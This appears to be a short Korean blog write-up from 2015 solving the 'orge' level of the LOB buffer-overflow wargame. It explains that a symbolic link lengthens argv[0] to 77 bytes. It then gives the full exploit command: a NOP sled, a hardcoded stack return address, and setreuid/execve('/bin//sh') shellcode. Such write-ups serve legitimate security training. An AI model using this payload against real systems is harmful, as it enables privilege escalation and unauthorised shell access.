Wargame/CTF(Capture The Flag)

LOB orge

𝓛𝓾𝓬𝓮𝓽𝓮_𝓢𝓽𝓮𝓵𝓵𝓪 2015. 9. 15.

728x90

코드를 열어보면

argv[0]=file이름이다. 그러므로 파일이름을 77byte를 맞춰주기 위해 심볼릭 링크를 걸어준다. ./까지 포함하므로 75를 한다.

나머지는 동일

./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(심볼릭 링크) $(python -c 'print "\x90"*40+"AAAA"+"\x9c\xfb\xff\xbf(주소값)"') $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')

728x90

저작자표시

'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글

LOB orge -> troll (0)	2015.10.15
pwnable.kr shellshock (0)	2015.10.11
LOB darklf (0)	2015.09.15
LOB wolfman (0)	2015.09.15
LOB orc (0)	2015.09.15

LOB orge

'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글

댓글

티스토리툴바